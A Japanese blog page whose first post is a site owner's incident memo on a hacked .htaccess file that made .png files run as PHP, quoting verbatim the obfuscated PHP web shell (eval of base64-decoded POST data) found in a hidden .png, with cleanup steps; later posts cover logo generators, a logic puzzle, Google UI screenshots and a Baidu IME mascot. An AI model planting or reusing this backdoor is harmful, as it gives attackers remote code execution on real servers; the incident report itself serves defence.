【メモ】.htaccess改ざん事例(.htaccess/png/eval)※追記あり
正直解決策になっているのかどうかよくわからないのですが日本語のページがほとんどなかったのでメモ。
現象
あるサイトの.htaccessが改ざんされていました。
【元】
AddHandler application/x-httpd-php .html
【改ざん】
AddHandler application/x-httpd-php .png
→「pngファイルをphpととして読み込む」的なもの?
そして.htaccessと同じ階層に、「.****.png」という不可解なファイル。
それをファイルとして開いてみると
<?php ($_=$_POST).($_1=’_').($_4=$$_1).($_4=$_4[$_1]).($_4($$_1)).eval(base64_decode($_4($$_1)));?>
というコードが記載。なにこれこわい。
※あとファイル更新時間でソートをかけたらindex.bak.phpみたいなファイルがありました(消してしまったのでうろ覚え)。
応急処置
色々と情報を集めてみたのですが、POSTデータを実行している云々で実際の挙動に何が起こっているのか正直よくわかりませんでした。
ひとまずの応急処置として
1..****.pngのデータを削除
2.パスワード関連全変更
3..htaccessの修正。
AddHandler application/x-httpd-php .png
→pngをhtmlに修正
4.index.bak.phpの削除
といった対処をしています。
もしなにか分かる情報(「こうした方がいいよ!」とか)があれば教えていただけるとありがたいです!
※追記(2012.5.18 8:44a.m.)
ロリポップのサーバーで起こった事例、という情報をいただいています(2件)。
ロゴデザインジェネレーターで遊んでたら土曜日が終わった【追加作成あり】
誰でも手軽にロゴが作れるというサイトを見つけたのでいろんなものを作ってみました。
最初のものは見たまんまですがAKB48風バカに毛が生えたロゴ。
完全に自己満足です。本当にありがとうございました。
各種作ってみたロゴ
twitter風
ラブプラス風
らき☆すた風
けいおん!風
とある魔術の禁書目録風
まどか☆マギカ風。ちょっとデザイン崩しちゃいました。
その他にもGoogle風ロゴ、amazon風ロゴなど様々なロゴが作れます。
参照:ロゴジェネレーター
デザインが出来て、それを誰でもできるような仕組みにするっていいですね。
※2012.2.5 20:33追記
@kim_identityさんの「とある魔術の禁書目録」風ロゴをヘッダーに入れてみた | 大阪のWEBマーケティング雑記を見て、そうだよね、禁書目録とか超電磁砲とか考えると四文字の漢字にしなくちゃダメだよね、と思って修正。
うん、強引すぎるなw
あと、はがないジェネレーターというのも見つけたので作成。
ただの自虐じゃないのかというね・・・
Categories パソコン・インターネット, 知らなかったシリーズ | Comment (0)「幼稚園の入試問題。AとB,C,Dは隔離されていてお互いが見えない。」というソーシャルに流れてた問題の答え
twitterとかfacebookで流れていたアレ
幼稚園の入試問題。AとB,C,Dは隔離されていてお互いが見えない。4人は4人が黒白2つずつ帽子をかぶっていることのみ知っている。後ろと自分の帽子は見てはいけない。誰が一番最初に自分の帽子の色をあてられるか。解けたから幼稚園入り直してくる。
元々2chのコピペとかであったらしい。
これが元ネタ。
1 :以下、名無しにかわりましてVIPがお送りします:2008/10/25(土) 15:58:28.10 ID:5I6I7NRy0
囚人が4人、図のような配置で密室に閉じ込められている。
4人の囚人にはそれぞれ赤の帽子2つ、白の帽子2つのうちどちらか一つがかぶせられ、
囚人達には自分がどの色の帽子をかぶせられているかはわからない。
囚人Aは、他の3人とは壁で隔離されている。
囚人B、C、Dは図のような形(階段)で配置されている。
それぞれの向いている方向は、帽子のつばの方向である。
このような状況の中、誰か1人でも自分の帽子の色を言い当てられれば全員釈放されるという。
なお、囚人同士がコンタクトを取ることは禁止されていて、歩いたり振り向いたりしてもいけない。
自分の帽子の色を確実に答えられる囚人が1人いる。それは誰か?
答え
2 :以下、名無しにかわりましてVIPがお送りします:2008/10/25(土) 16:04:06.01 ID:LLycoVswO
Dが答えなければBCは赤白、白赤のどっちかだからCがBの帽子を見ればいい
解説
Dは、BとCの帽子の色が見えるのでDが一番他の人の帽子の色が把握できるのでDを中心に考える。 Dがはっきりと答えられる時、BとCが同じ色である必要がある。 もし、BとCが違う色の帽子だとDは、赤の可能性も白の可能性もある。 逆に言えば、Dがはっきりと答えられない時は、BとCが違う色の帽子だということが分かる。 ここで、CがBの帽子の色をみることが出来るからCが正確な色を答えることが出来る。 この問題で、重要な所は、答えられない時という場合を考えること。 答えられる人を答える問題で答えられない場合という裏の事象を考えることが、ポイント。
こちらに書いてありました:数学の問題集 in VIP@wiki – 論理パズル
ちょっと面白かったので更新してみましたw
頭固いなー、自分w
(参考用)PC/iPhone/iPadのGoogle検索結果画面を比較してみた
先日iPadのGoogleの画面を眺めていたら、結構インターフェイスが異なることに気が付いたので更新。
各種端末でのGoogleの画面って、端末を持っていない人はなかなか見る機会がないんじゃないでしょうか。
今回参考用として画面のキャプチャを比較してみました。
※自分はAndroid端末を持っていないのでそこは欲しいところです。
PC
※クリックすると拡大します。
iPhone
※クリックすると拡大します。
左がSafari版/右がアプリ版。
Safariの方だとインスタントプレビュー実装、アプリ版だと関連検索が表示、というのが特色。
あとアプリ版は検索窓が上部固定。
フッターのページ表示が「5」まで。
関連検索(画像・動画など)はページ上部にタブ形式で表示。
英語の翻訳ページ候補が表示なし。
iPad
※クリックすると拡大します。
左がSafari版/右がアプリ版。
関連検索(画像・動画など)が横表示になってるのがちょっと面白いですね。
フッターのページ表示が「11」まで。
英語の翻訳ページ候補が表示。
表示モードは「タブレット/PC」の区別。
あと、Google.comの変化を今更見たのでこれもメモ。
Google.com通常画面
※クリックすると拡大します。
注目すべきはロゴの部分をクリックした際の表示。
「More」部分をクリックするとさらに表示。
これはなかなか美しい。
****
デバイスごとの画面を比較してみると、なかなか面白い部分もありますね。
同じ検索結果でも見え方が変わることがあるので参考まで。
Baidu IMEに新萌えキャラ「愛美」が登場してた
Baidu IMEにいつの間にか萌えキャラ設定されていたので更新。
とても絶妙なラインw
そして予想以上に自己紹介が大雑把w
表情パターンは数種類しかないですが個人的にはこの表情が好きです。
この髪飾り左右両方に付けてるのかしら。
ただ、ちょっとアレかなーと思うのが、最後の一言。
いつもはなんとなく使っていて特に意識することもなかったIMEだけど、今回Baidu IMEを使ってみてその楽しさを実感したら、もう元には戻れなくなっちゃった(´∀`*) 愛美のカワイイスキンと一緒に、これからもっとブログ更新したり、チャットしたり、ますますネットライフが楽しくなっちゃいそう。みんなもこれからの愛美を要チェックだゾ
自ら「カワイイ」と言いやがった・・・!
あと「要チェックだゾ」て!
正直、禁書目録の食蜂操祈くらい可愛ければなんか許せる部分があるんですが・・・。
参考:愛美のIME体験レポート Baidu IMEで、ブログ書くのがもっと楽しくなっちゃった!
ファイル名見る限り12/19に公開されたのかも。
****
別の話。
twitterに他人の顔写真アップしちゃダメだろこれw
Categories ニュース, パソコン・インターネット, 知らなかったシリーズ | Comment (0)